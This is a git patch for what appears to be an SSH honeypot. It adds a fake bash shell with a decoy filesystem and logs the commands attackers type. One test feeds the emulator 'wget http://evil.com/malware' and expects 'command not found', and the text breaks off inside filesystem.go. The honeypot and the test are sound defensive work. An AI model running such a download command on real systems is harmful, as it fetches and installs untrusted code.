From 8189a108d1830912f2cbc2ef7f9266312725a410 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Torjus=20H=C3=A5kestad?= Date: Sat, 14 Feb 2026 20:24:48 +0100 Subject: [PATCH] feat: add shell interface, registry, and bash shell emulator Implement Phase 1.4: replaces the hardcoded banner/timeout stub with a proper shell system. Adds a Shell interface with weighted registry for shell selection, a RecordingChannel wrapper (pass-through for now, prep for Phase 2.3 replay), and a bash-like shell with fake filesystem, terminal line reader, and command handling (pwd, ls, cd, cat, whoami, hostname, id, uname, exit). Sessions now log command/output pairs to the store and record the shell name. Co-Authored-By: Claude Opus 4.6 --- README.md | 3 + internal/config/config.go | 56 ++++++- internal/config/config_test.go | 53 +++++++ internal/server/server.go | 95 +++++++----- internal/server/server_test.go | 64 +++++++- internal/shell/bash/bash.go | 158 +++++++++++++++++++ internal/shell/bash/bash_test.go | 198 ++++++++++++++++++++++++ internal/shell/bash/commands.go | 119 +++++++++++++++ internal/shell/bash/commands_test.go | 201 +++++++++++++++++++++++++ internal/shell/bash/filesystem.go | 166 ++++++++++++++++++++ internal/shell/bash/filesystem_test.go | 140 +++++++++++++++++ internal/shell/recorder.go | 19 +++ internal/shell/recorder_test.go | 43 ++++++ internal/shell/registry.go | 84 +++++++++++ internal/shell/registry_test.go | 107 +++++++++++++ internal/shell/shell.go | 33 ++++ oubliette.toml.example | 5 + 17 files changed, 1503 insertions(+), 41 deletions(-) create mode 100644 internal/shell/bash/bash.go create mode 100644 internal/shell/bash/bash_test.go create mode 100644 internal/shell/bash/commands.go create mode 100644 internal/shell/bash/commands_test.go create mode 100644 internal/shell/bash/filesystem.go create mode 100644 internal/shell/bash/filesystem_test.go create mode 100644 internal/shell/recorder.go create mode 100644 internal/shell/recorder_test.go create mode 100644 internal/shell/registry.go create mode 100644 internal/shell/registry_test.go create mode 100644 internal/shell/shell.go diff --git a/README.md b/README.md index 6b7b8f1..b4a1931 100644 --- a/README.md +++ b/README.md @@ -37,6 +37,9 @@ Key settings: - `storage.db_path` — SQLite database path (default `oubliette.db`) - `storage.retention_days` — auto-prune records older than N days (default `90`) - `storage.retention_interval` — how often to run retention (default `1h`) +- `shell.hostname` — hostname shown in shell prompts (default `ubuntu-server`) +- `shell.banner` — banner displayed on connection +- `shell.fake_user` — override username in prompt; empty uses the authenticated user ### Run diff --git a/internal/config/config.go b/internal/config/config.go index 5f4cc30..ac0d9a4 100644 --- a/internal/config/config.go +++ b/internal/config/config.go @@ -9,11 +9,19 @@ import ( ) type Config struct { - SSH SSHConfig `toml:"ssh"` - Auth AuthConfig `toml:"auth"` - Storage StorageConfig `toml:"storage"` - LogLevel string `toml:"log_level"` - LogFormat string `toml:"log_format"` // "text" (default) or "json" + SSH SSHConfig `toml:"ssh"` + Auth AuthConfig `toml:"auth"` + Storage StorageConfig `toml:"storage"` + Shell ShellConfig `toml:"shell"` + LogLevel string `toml:"log_level"` + LogFormat string `toml:"log_format"` // "text" (default) or "json" +} + +type ShellConfig struct { + Hostname string `toml:"hostname"` + Banner string `toml:"banner"` + FakeUser string `toml:"fake_user"` + Shells map[string]map[string]any `toml:"-"` // per-shell config extracted manually } type StorageConfig struct { @@ -56,6 +64,14 @@ func Load(path string) (*Config, error) { return nil, fmt.Errorf("parsing config: %w", err) } + // Second pass: extract per-shell sub-tables (e.g. [shell.bash]). + var raw map[string]any + if err := toml.Unmarshal(data, &raw); err == nil { + if shellSection, ok := raw["shell"].(map[string]any); ok { + cfg.Shell.Shells = extractShellTables(shellSection) + } + } + applyDefaults(cfg) if err := validate(cfg); err != nil { @@ -96,6 +112,36 @@ func applyDefaults(cfg *Config) { if cfg.Storage.RetentionInterval == "" { cfg.Storage.RetentionInterval = "1h" } + if cfg.Shell.Hostname == "" { + cfg.Shell.Hostname = "ubuntu-server" + } + if cfg.Shell.Banner == "" { + cfg.Shell.Banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n" + } +} + +// knownShellKeys are top-level keys in [shell] that are not per-shell sub-tables. +var knownShellKeys = map[string]bool{ + "hostname": true, + "banner": true, + "fake_user": true, +} + +// extractShellTables pulls per-shell config sub-tables from the raw [shell] section. +func extractShellTables(section map[string]any) map[string]map[string]any { + result := make(map[string]map[string]any) + for key, val := range section { + if knownShellKeys[key] { + continue + } + if sub, ok := val.(map[string]any); ok { + result[key] = sub + } + } + if len(result) == 0 { + return nil + } + return result } func validate(cfg *Config) error { diff --git a/internal/config/config_test.go b/internal/config/config_test.go index 6cc0f42..156dc98 100644 --- a/internal/config/config_test.go +++ b/internal/config/config_test.go @@ -169,6 +169,59 @@ retention_interval = "2h" } } +func TestLoadShellDefaults(t *testing.T) { + path := writeTemp(t, "") + cfg, err := Load(path) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if cfg.Shell.Hostname != "ubuntu-server" { + t.Errorf("default hostname = %q, want %q", cfg.Shell.Hostname, "ubuntu-server") + } + if cfg.Shell.Banner == "" { + t.Error("default banner should not be empty") + } + if cfg.Shell.FakeUser != "" { + t.Errorf("default fake_user = %q, want empty", cfg.Shell.FakeUser) + } +} + +func TestLoadShellConfig(t *testing.T) { + content := ` +[shell] +hostname = "myhost" +banner = "Custom banner\r\n" +fake_user = "admin" + +[shell.bash] +custom_key = "value" +` + path := writeTemp(t, content) + cfg, err := Load(path) + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if cfg.Shell.Hostname != "myhost" { + t.Errorf("hostname = %q, want %q", cfg.Shell.Hostname, "myhost") + } + if cfg.Shell.Banner != "Custom banner\r\n" { + t.Errorf("banner = %q, want %q", cfg.Shell.Banner, "Custom banner\r\n") + } + if cfg.Shell.FakeUser != "admin" { + t.Errorf("fake_user = %q, want %q", cfg.Shell.FakeUser, "admin") + } + if cfg.Shell.Shells == nil { + t.Fatal("Shells map should not be nil") + } + bashCfg, ok := cfg.Shell.Shells["bash"] + if !ok { + t.Fatal("Shells[\"bash\"] not found") + } + if bashCfg["custom_key"] != "value" { + t.Errorf("Shells[\"bash\"][\"custom_key\"] = %v, want %q", bashCfg["custom_key"], "value") + } +} + func TestLoadMissingFile(t *testing.T) { _, err := Load("/nonexistent/path/config.toml") if err == nil { diff --git a/internal/server/server.go b/internal/server/server.go index 46a8f85..62dc597 100644 --- a/internal/server/server.go +++ b/internal/server/server.go @@ -14,28 +14,35 @@ import ( "git.t-juice.club/torjus/oubliette/internal/auth" "git.t-juice.club/torjus/oubliette/internal/config" + "git.t-juice.club/torjus/oubliette/internal/shell" + "git.t-juice.club/torjus/oubliette/internal/shell/bash" "git.t-juice.club/torjus/oubliette/internal/storage" "golang.org/x/crypto/ssh" ) -const sessionTimeout = 30 * time.Second - type Server struct { - cfg config.Config - store storage.Store - authenticator *auth.Authenticator - sshConfig *ssh.ServerConfig - logger *slog.Logger - connSem chan struct{} // semaphore limiting concurrent connections + cfg config.Config + store storage.Store + authenticator *auth.Authenticator + sshConfig *ssh.ServerConfig + logger *slog.Logger + connSem chan struct{} // semaphore limiting concurrent connections + shellRegistry *shell.Registry } func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) { + registry := shell.NewRegistry() + if err := registry.Register(bash.NewBashShell(), 1); err != nil { + return nil, fmt.Errorf("registering bash shell: %w", err) + } + s := &Server{ cfg: cfg, store: store, authenticator: auth.NewAuthenticator(cfg.Auth), logger: logger, connSem: make(chan struct{}, cfg.SSH.MaxConnections), + shellRegistry: registry, } hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath) @@ -126,8 +133,15 @@ func (s *Server) handleConn(conn net.Conn) { func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) { defer channel.Close() + // Select a shell from the registry. + selectedShell, err := s.shellRegistry.Select() + if err != nil { + s.logger.Error("failed to select shell", "err", err) + return + } + ip := extractIP(conn.RemoteAddr()) - sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), "") + sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), selectedShell.Name()) if err != nil { s.logger.Error("failed to create session", "err", err) } else { @@ -138,6 +152,13 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request }() } + s.logger.Info("session started", + "remote_addr", conn.RemoteAddr(), + "user", conn.User(), + "shell", selectedShell.Name(), + "session_id", sessionID, + ) + // Handle session requests (pty-req, shell, etc.) go func() { for req := range requests { @@ -154,33 +175,37 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request } }() - // Write a fake banner. - fmt.Fprint(channel, "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n") - fmt.Fprintf(channel, "Last login: %s from 10.0.0.1\r\n", time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006")) - fmt.Fprintf(channel, "%s@ubuntu:~$ ", conn.User()) - - // Hold connection open until timeout or client disconnect. - timer := time.NewTimer(sessionTimeout) - defer timer.Stop() - - done := make(chan struct{}) - go func() { - buf := make([]byte, 256) - for { - _, err := channel.Read(buf) - if err != nil { - close(done) - return - } - } - }() - - select { - case <-timer.C: - s.logger.Info("session timed out", "remote_addr", conn.RemoteAddr(), "user", conn.User()) - case <-done: - s.logger.Info("session closed by client", "remote_addr", conn.RemoteAddr(), "user", conn.User()) + // Build session context. + var shellCfg map[string]any + if s.cfg.Shell.Shells != nil { + shellCfg = s.cfg.Shell.Shells[selectedShell.Name()] } + sessCtx := &shell.SessionContext{ + SessionID: sessionID, + Username: conn.User(), + RemoteAddr: ip, + ClientVersion: string(conn.ClientVersion()), + Store: s.store, + ShellConfig: shellCfg, + CommonConfig: shell.ShellCommonConfig{ + Hostname: s.cfg.Shell.Hostname, + Banner: s.cfg.Shell.Banner, + FakeUser: s.cfg.Shell.FakeUser, + }, + } + + // Wrap channel in RecordingChannel for future byte-level recording. + recorder := shell.NewRecordingChannel(channel) + + if err := selectedShell.Handle(context.Background(), sessCtx, recorder); err != nil { + s.logger.Error("shell error", "err", err, "session_id", sessionID) + } + + s.logger.Info("session ended", + "remote_addr", conn.RemoteAddr(), + "user", conn.User(), + "session_id", sessionID, + ) } func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) { diff --git a/internal/server/server_test.go b/internal/server/server_test.go index 7de127a..ee29086 100644 --- a/internal/server/server_test.go +++ b/internal/server/server_test.go @@ -1,11 +1,13 @@ package server import ( + "bytes" "context" "log/slog" "net" "os" "path/filepath" + "strings" "testing" "time" @@ -109,6 +111,10 @@ func TestIntegrationSSHConnect(t *testing.T) { {Username: "root", Password: "toor"}, }, }, + Shell: config.ShellConfig{ + Hostname: "ubuntu-server", + Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n", + }, LogLevel: "debug", } @@ -152,7 +158,7 @@ func TestIntegrationSSHConnect(t *testing.T) { time.Sleep(50 * time.Millisecond) } - // Test static credential login. + // Test static credential login with shell interaction. t.Run("static_cred", func(t *testing.T) { clientCfg := &ssh.ClientConfig{ User: "root", @@ -172,6 +178,62 @@ func TestIntegrationSSHConnect(t *testing.T) { t.Fatalf("new session: %v", err) } defer session.Close() + + // Request PTY and shell. + if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil { + t.Fatalf("request pty: %v", err) + } + + stdin, err := session.StdinPipe() + if err != nil { + t.Fatalf("stdin pipe: %v", err) + } + + var output bytes.Buffer + session.Stdout = &output + + if err := session.Shell(); err != nil { + t.Fatalf("shell: %v", err) + } + + // Wait for the prompt, then send commands. + time.Sleep(500 * time.Millisecond) + stdin.Write([]byte("pwd\r")) + time.Sleep(200 * time.Millisecond) + stdin.Write([]byte("whoami\r")) + time.Sleep(200 * time.Millisecond) + stdin.Write([]byte("exit\r")) + + // Wait for session to end. + session.Wait() + + out := output.String() + if !strings.Contains(out, "Welcome to Ubuntu") { + t.Errorf("output should contain banner, got: %s", out) + } + if !strings.Contains(out, "/root") { + t.Errorf("output should contain /root from pwd, got: %s", out) + } + if !strings.Contains(out, "root") { + t.Errorf("output should contain 'root' from whoami, got: %s", out) + } + + // Verify session logs were recorded. + if len(store.SessionLogs) < 2 { + t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs)) + } + + // Verify session was created with shell name. + var foundBash bool + for _, s := range store.Sessions { + if s.ShellName == "bash" { + foundBash = true + break + } + } + if !foundBash { + t.Error("expected a session with shell_name='bash'") + } }) // Test wrong password is rejected. diff --git a/internal/shell/bash/bash.go b/internal/shell/bash/bash.go new file mode 100644 index 0000000..fa03178 --- /dev/null +++ b/internal/shell/bash/bash.go @@ -0,0 +1,158 @@ +package bash + +import ( + "context" + "fmt" + "io" + "strings" + "time" + + "git.t-juice.club/torjus/oubliette/internal/shell" +) + +const sessionTimeout = 5 * time.Minute + +// BashShell emulates a basic bash-like shell. +type BashShell struct{} + +// NewBashShell returns a new BashShell instance. +func NewBashShell() *BashShell { + return &BashShell{} +} + +func (b *BashShell) Name() string { return "bash" } +func (b *BashShell) Description() string { return "Basic bash-like shell emulator" } + +func (b *BashShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error { + ctx, cancel := context.WithTimeout(ctx, sessionTimeout) + defer cancel() + + username := sess.Username + if sess.CommonConfig.FakeUser != "" { + username = sess.CommonConfig.FakeUser + } + hostname := sess.CommonConfig.Hostname + + fs := newFilesystem(hostname) + state := &shellState{ + cwd: "/root", + username: username, + hostname: hostname, + fs: fs, + } + + // Send banner. + if sess.CommonConfig.Banner != "" { + fmt.Fprint(rw, sess.CommonConfig.Banner) + } + fmt.Fprintf(rw, "Last login: %s from 10.0.0.1\r\n", + time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006")) + + for { + prompt := formatPrompt(state) + if _, err := fmt.Fprint(rw, prompt); err != nil { + return nil + } + + line, err := readLine(ctx, rw) + if err == io.EOF { + fmt.Fprint(rw, "logout\r\n") + return nil + } + if err != nil { + return nil + } + + trimmed := strings.TrimSpace(line) + if trimmed == "" { + continue + } + + result := dispatch(state, trimmed) + + var output string + if result.output != "" { + output = result.output + // Convert newlines to \r\n for terminal display. + output = strings.ReplaceAll(output, "\r\n", "\n") + output = strings.ReplaceAll(output, "\n", "\r\n") + fmt.Fprintf(rw, "%s\r\n", output) + } + + // Log command and output to store. + if sess.Store != nil { + sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output) + } + + if result.exit { + return nil + } + } +} + +func formatPrompt(state *shellState) string { + cwd := state.cwd + if cwd == "/root" { + cwd = "~" + } else if strings.HasPrefix(cwd, "/root/") { + cwd = "~" + cwd[5:] + } + return fmt.Sprintf("%s@%s:%s# ", state.username, state.hostname, cwd) +} + +// readLine reads a line of input byte-by-byte, handling backspace, Ctrl+C, and Ctrl+D. +func readLine(ctx context.Context, rw io.ReadWriter) (string, error) { + var buf []byte + b := make([]byte, 1) + + for { + select { + case <-ctx.Done(): + return "", ctx.Err() + default: + } + + n, err := rw.Read(b) + if err != nil { + return "", err + } + if n == 0 { + continue + } + + ch := b[0] + switch { + case ch == '\r' || ch == '\n': + fmt.Fprint(rw, "\r\n") + return string(buf), nil + + case ch == 4: // Ctrl+D + if len(buf) == 0 { + return "", io.EOF + } + + case ch == 3: // Ctrl+C + fmt.Fprint(rw, "^C\r\n") + return "", nil + + case ch == 127 || ch == 8: // DEL or Backspace + if len(buf) > 0 { + buf = buf[:len(buf)-1] + fmt.Fprint(rw, "\b \b") + } + + case ch == 27: // ESC - start of escape sequence + // Read and discard the rest of the escape sequence. + // Most are 3 bytes: ESC [ X (arrow keys, etc.) + next := make([]byte, 1) + rw.Read(next) + if next[0] == '[' { + rw.Read(next) // read the final byte + } + + case ch >= 32 && ch < 127: // printable ASCII + buf = append(buf, ch) + rw.Write([]byte{ch}) + } + } +} diff --git a/internal/shell/bash/bash_test.go b/internal/shell/bash/bash_test.go new file mode 100644 index 0000000..bd3c8d9 --- /dev/null +++ b/internal/shell/bash/bash_test.go @@ -0,0 +1,198 @@ +package bash + +import ( + "bytes" + "context" + "io" + "strings" + "testing" + "time" + + "git.t-juice.club/torjus/oubliette/internal/shell" + "git.t-juice.club/torjus/oubliette/internal/storage" +) + +type rwCloser struct { + io.Reader + io.Writer + closed bool +} + +func (r *rwCloser) Close() error { + r.closed = true + return nil +} + +func TestFormatPrompt(t *testing.T) { + tests := []struct { + cwd string + want string + }{ + {"/root", "root@host:~# "}, + {"/root/sub", "root@host:~/sub# "}, + {"/tmp", "root@host:/tmp# "}, + {"/", "root@host:/# "}, + } + + for _, tt := range tests { + state := &shellState{cwd: tt.cwd, username: "root", hostname: "host"} + got := formatPrompt(state) + if got != tt.want { + t.Errorf("formatPrompt(cwd=%q) = %q, want %q", tt.cwd, got, tt.want) + } + } +} + +func TestReadLineEnter(t *testing.T) { + input := bytes.NewBufferString("hello\r") + var output bytes.Buffer + rw := struct { + io.Reader + io.Writer + }{input, &output} + + ctx := context.Background() + line, err := readLine(ctx, rw) + if err != nil { + t.Fatalf("readLine: %v", err) + } + if line != "hello" { + t.Errorf("line = %q, want %q", line, "hello") + } +} + +func TestReadLineBackspace(t *testing.T) { + // Type "helo", backspace, then "lo\r" + input := bytes.NewBuffer([]byte{'h', 'e', 'l', 'o', 127, 'l', 'o', '\r'}) + var output bytes.Buffer + rw := struct { + io.Reader + io.Writer + }{input, &output} + + ctx := context.Background() + line, err := readLine(ctx, rw) + if err != nil { + t.Fatalf("readLine: %v", err) + } + if line != "hello" { + t.Errorf("line = %q, want %q", line, "hello") + } +} + +func TestReadLineCtrlC(t *testing.T) { + input := bytes.NewBuffer([]byte("partial\x03")) + var output bytes.Buffer + rw := struct { + io.Reader + io.Writer + }{input, &output} + + ctx := context.Background() + line, err := readLine(ctx, rw) + if err != nil { + t.Fatalf("readLine: %v", err) + } + if line != "" { + t.Errorf("line after Ctrl+C = %q, want empty", line) + } +} + +func TestReadLineCtrlD(t *testing.T) { + input := bytes.NewBuffer([]byte{4}) // Ctrl+D on empty line + var output bytes.Buffer + rw := struct { + io.Reader + io.Writer + }{input, &output} + + ctx := context.Background() + _, err := readLine(ctx, rw) + if err != io.EOF { + t.Fatalf("expected io.EOF, got %v", err) + } +} + +func TestBashShellHandle(t *testing.T) { + store := storage.NewMemoryStore() + sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "bash") + + sess := &shell.SessionContext{ + SessionID: sessID, + Username: "root", + Store: store, + CommonConfig: shell.ShellCommonConfig{ + Hostname: "testhost", + Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n", + }, + } + + // Simulate typing commands followed by "exit\r" + commands := "pwd\rwhoami\rexit\r" + clientInput := bytes.NewBufferString(commands) + var clientOutput bytes.Buffer + rw := &rwCloser{ + Reader: clientInput, + Writer: &clientOutput, + } + + sh := NewBashShell() + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + err := sh.Handle(ctx, sess, rw) + if err != nil { + t.Fatalf("Handle: %v", err) + } + + output := clientOutput.String() + + // Should contain banner. + if !strings.Contains(output, "Welcome to Ubuntu") { + t.Error("output should contain banner") + } + + // Should contain prompt with hostname. + if !strings.Contains(output, "root@testhost") { + t.Errorf("output should contain prompt, got: %s", output) + } + + // Check session logs were recorded. + if len(store.SessionLogs) < 2 { + t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs)) + } +} + +func TestBashShellFakeUser(t *testing.T) { + store := storage.NewMemoryStore() + sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "attacker", "bash") + + sess := &shell.SessionContext{ + SessionID: sessID, + Username: "attacker", + Store: store, + CommonConfig: shell.ShellCommonConfig{ + Hostname: "testhost", + FakeUser: "admin", + }, + } + + commands := "whoami\rexit\r" + clientInput := bytes.NewBufferString(commands) + var clientOutput bytes.Buffer + rw := &rwCloser{ + Reader: clientInput, + Writer: &clientOutput, + } + + sh := NewBashShell() + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + sh.Handle(ctx, sess, rw) + + output := clientOutput.String() + if !strings.Contains(output, "admin") { + t.Errorf("output should contain fake user 'admin', got: %s", output) + } +} diff --git a/internal/shell/bash/commands.go b/internal/shell/bash/commands.go new file mode 100644 index 0000000..d076c0f --- /dev/null +++ b/internal/shell/bash/commands.go @@ -0,0 +1,119 @@ +package bash + +import ( + "fmt" + "runtime" + "sort" + "strings" +) + +type shellState struct { + cwd string + username string + hostname string + fs *filesystem +} + +type commandResult struct { + output string + exit bool +} + +func dispatch(state *shellState, line string) commandResult { + fields := strings.Fields(line) + if len(fields) == 0 { + return commandResult{} + } + + cmd := fields[0] + args := fields[1:] + + switch cmd { + case "pwd": + return commandResult{output: state.cwd} + case "whoami": + return commandResult{output: state.username} + case "hostname": + return commandResult{output: state.hostname} + case "id": + return cmdID(state) + case "uname": + return cmdUname(state, args) + case "ls": + return cmdLs(state, args) + case "cd": + return cmdCd(state, args) + case "cat": + return cmdCat(state, args) + case "exit", "logout": + return commandResult{exit: true} + default: + return commandResult{output: fmt.Sprintf("%s: command not found", cmd)} + } +} + +func cmdID(state *shellState) commandResult { + return commandResult{ + output: fmt.Sprintf("uid=0(%s) gid=0(%s) groups=0(%s)", state.username, state.username, state.username), + } +} + +func cmdUname(state *shellState, args []string) commandResult { + if len(args) > 0 && args[0] == "-a" { + return commandResult{ + output: fmt.Sprintf("Linux %s 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 %s GNU/Linux", state.hostname, runtime.GOARCH), + } + } + return commandResult{output: "Linux"} +} + +func cmdLs(state *shellState, args []string) commandResult { + target := state.cwd + if len(args) > 0 { + target = resolvePath(state.cwd, args[0]) + } + + names, err := state.fs.list(target) + if err != nil { + return commandResult{output: err.Error()} + } + + sort.Strings(names) + return commandResult{output: strings.Join(names, " ")} +} + +func cmdCd(state *shellState, args []string) commandResult { + target := "/root" + if len(args) > 0 { + target = resolvePath(state.cwd, args[0]) + } + + if !state.fs.exists(target) { + return commandResult{output: fmt.Sprintf("bash: cd: %s: No such file or directory", args[0])} + } + if !state.fs.isDirectory(target) { + return commandResult{output: fmt.Sprintf("bash: cd: %s: Not a directory", args[0])} + } + + state.cwd = target + return commandResult{} +} + +func cmdCat(state *shellState, args []string) commandResult { + if len(args) == 0 { + return commandResult{} + } + + var parts []string + for _, arg := range args { + p := resolvePath(state.cwd, arg) + content, err := state.fs.read(p) + if err != nil { + parts = append(parts, err.Error()) + } else { + parts = append(parts, strings.TrimRight(content, "\n")) + } + } + + return commandResult{output: strings.Join(parts, "\n")} +} diff --git a/internal/shell/bash/commands_test.go b/internal/shell/bash/commands_test.go new file mode 100644 index 0000000..17b0b34 --- /dev/null +++ b/internal/shell/bash/commands_test.go @@ -0,0 +1,201 @@ +package bash + +import ( + "strings" + "testing" +) + +func newTestState() *shellState { + fs := newFilesystem("testhost") + return &shellState{ + cwd: "/root", + username: "root", + hostname: "testhost", + fs: fs, + } +} + +func TestCmdPwd(t *testing.T) { + state := newTestState() + r := dispatch(state, "pwd") + if r.output != "/root" { + t.Errorf("pwd = %q, want %q", r.output, "/root") + } +} + +func TestCmdWhoami(t *testing.T) { + state := newTestState() + r := dispatch(state, "whoami") + if r.output != "root" { + t.Errorf("whoami = %q, want %q", r.output, "root") + } +} + +func TestCmdHostname(t *testing.T) { + state := newTestState() + r := dispatch(state, "hostname") + if r.output != "testhost" { + t.Errorf("hostname = %q, want %q", r.output, "testhost") + } +} + +func TestCmdId(t *testing.T) { + state := newTestState() + r := dispatch(state, "id") + if !strings.Contains(r.output, "uid=0(root)") { + t.Errorf("id output = %q, want uid=0(root)", r.output) + } +} + +func TestCmdUnameBasic(t *testing.T) { + state := newTestState() + r := dispatch(state, "uname") + if r.output != "Linux" { + t.Errorf("uname = %q, want %q", r.output, "Linux") + } +} + +func TestCmdUnameAll(t *testing.T) { + state := newTestState() + r := dispatch(state, "uname -a") + if !strings.HasPrefix(r.output, "Linux testhost") { + t.Errorf("uname -a = %q, want prefix 'Linux testhost'", r.output) + } +} + +func TestCmdLs(t *testing.T) { + state := newTestState() + r := dispatch(state, "ls") + if r.output == "" { + t.Error("ls should return non-empty output") + } +} + +func TestCmdLsPath(t *testing.T) { + state := newTestState() + r := dispatch(state, "ls /etc") + if !strings.Contains(r.output, "passwd") { + t.Errorf("ls /etc = %q, should contain 'passwd'", r.output) + } +} + +func TestCmdLsNonexistent(t *testing.T) { + state := newTestState() + r := dispatch(state, "ls /nope") + if !strings.Contains(r.output, "No such file") { + t.Errorf("ls /nope = %q, should contain 'No such file'", r.output) + } +} + +func TestCmdCd(t *testing.T) { + state := newTestState() + r := dispatch(state, "cd /tmp") + if r.output != "" { + t.Errorf("cd /tmp should produce no output, got %q", r.output) + } + if state.cwd != "/tmp" { + t.Errorf("cwd = %q, want %q", state.cwd, "/tmp") + } +} + +func TestCmdCdNonexistent(t *testing.T) { + state := newTestState() + r := dispatch(state, "cd /nope") + if !strings.Contains(r.output, "No such file") { + t.Errorf("cd /nope = %q, should contain 'No such file'", r.output) + } +} + +func TestCmdCdNoArgs(t *testing.T) { + state := newTestState() + state.cwd = "/tmp" + dispatch(state, "cd") + if state.cwd != "/root" { + t.Errorf("cd with no args should go to /root, got %q", state.cwd) + } +} + +func TestCmdCdRelative(t *testing.T) { + state := newTestState() + state.cwd = "/var" + dispatch(state, "cd log") + if state.cwd != "/var/log" { + t.Errorf("cwd = %q, want %q", state.cwd, "/var/log") + } +} + +func TestCmdCdDotDot(t *testing.T) { + state := newTestState() + state.cwd = "/var/log" + dispatch(state, "cd ..") + if state.cwd != "/var" { + t.Errorf("cwd = %q, want %q", state.cwd, "/var") + } +} + +func TestCmdCat(t *testing.T) { + state := newTestState() + r := dispatch(state, "cat /etc/hostname") + if !strings.Contains(r.output, "testhost") { + t.Errorf("cat /etc/hostname = %q, should contain 'testhost'", r.output) + } +} + +func TestCmdCatNonexistent(t *testing.T) { + state := newTestState() + r := dispatch(state, "cat /nope") + if !strings.Contains(r.output, "No such file") { + t.Errorf("cat /nope = %q, should contain 'No such file'", r.output) + } +} + +func TestCmdCatDirectory(t *testing.T) { + state := newTestState() + r := dispatch(state, "cat /etc") + if !strings.Contains(r.output, "Is a directory") { + t.Errorf("cat /etc = %q, should contain 'Is a directory'", r.output) + } +} + +func TestCmdCatMultiple(t *testing.T) { + state := newTestState() + r := dispatch(state, "cat /etc/hostname /root/README.txt") + if !strings.Contains(r.output, "testhost") || !strings.Contains(r.output, "DO NOT MODIFY") { + t.Errorf("cat multiple files = %q, should contain both file contents", r.output) + } +} + +func TestCmdExit(t *testing.T) { + state := newTestState() + r := dispatch(state, "exit") + if !r.exit { + t.Error("exit should set exit=true") + } +} + +func TestCmdLogout(t *testing.T) { + state := newTestState() + r := dispatch(state, "logout") + if !r.exit { + t.Error("logout should set exit=true") + } +} + +func TestCmdNotFound(t *testing.T) { + state := newTestState() + r := dispatch(state, "wget http://evil.com/malware") + if !strings.Contains(r.output, "command not found") { + t.Errorf("unknown cmd = %q, should contain 'command not found'", r.output) + } + if !strings.HasPrefix(r.output, "wget:") { + t.Errorf("unknown cmd = %q, should start with 'wget:'", r.output) + } +} + +func TestCmdEmptyLine(t *testing.T) { + state := newTestState() + r := dispatch(state, "") + if r.output != "" || r.exit { + t.Errorf("empty line should produce no output and not exit") + } +} diff --git a/internal/shell/bash/filesystem.go b/internal/shell/bash/filesystem.go new file mode 100644 index 0000000..24d5183 --- /dev/null +++ b/internal/shell/bash/filesystem.go @@ -0,0 +1,166 @@ +package bash + +import ( + "fmt" + "path" + "strings" +) + +type fsNode struct { + name string + isDir bool + content string + children map[string]*fsNode +} + +type filesystem struct { + root *fsNode +} + +func newFilesystem(hostname string) *filesystem { + fs := &filesystem{ + root: &fsNode{name: "/", isDir: true, children: make(map[string]*fsNode)}, + } + + fs.mkdirAll("/etc") + fs.mkdirAll("/root") + fs.mkdirAll("/home") + fs.mkdirAll("/var/log") + fs.mkdirAll("/tmp") + fs.mkdirAll("/usr/bin") + fs.mkdirAll("/usr/local") + + fs.writeFile("/etc/passwd", "root:x:0:0:root:/root:/bin/bash\n"+ + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"+ + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"+ + "mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false\n") + + fs.writeFile("/etc/hostname", hostname+"\n") + + fs.writeFile("/etc/hosts", "127.0.0.1\tlocalhost\n"+ + "127.0.1.1\t"+hostname+"\n"+ + "::1\t\tlocalhost ip6-localhost ip6-loopback\n") + + fs.writeFile("/root/.bash_history", + "apt update\n"+ + "apt upgrade -y\n"+ + "systemctl restart nginx\n"+ + "tail -f /var/log/syslog\n"+ + "df -h\n"+ + "free -m\n"+ + "netstat -tlnp\n"+ + "cat /etc/passwd\n") + + fs.writeFile("/root/.bashrc", + "# ~/.bashrc: executed by bash(1) for non-login shells.\n"+ + "export PS1='\\u@\\h:\\w\\$ '\n"+ + "alias ll='ls -alF'\n"+ + "alias la='ls -A'\n") + + fs.writeFile("/root/README.txt", "Production server - DO NOT MODIFY\n") + + fs.writeFile("/var/log/syslog", + "Jan 12 03:14:22 "+hostname+" systemd[1]: Started Daily apt download activities.\n"+ + "Jan 12 03:14:23 "+hostname+" systemd[1]: Started Daily Cleanup of Temporary Directories.\n"+ + "Jan 12 04:00:01 "+hostname+" CRON[12345]: (root) CMD (/usr/local/bin/backup.sh)\n"+ + "Jan 12 04:00:03 "+hostname+" kernel: [UFW BLOCK] IN=eth0 OUT= SRC=203.0.113.42 DST=10.0.0.5 PROTO=TCP DPT=22\n") + + 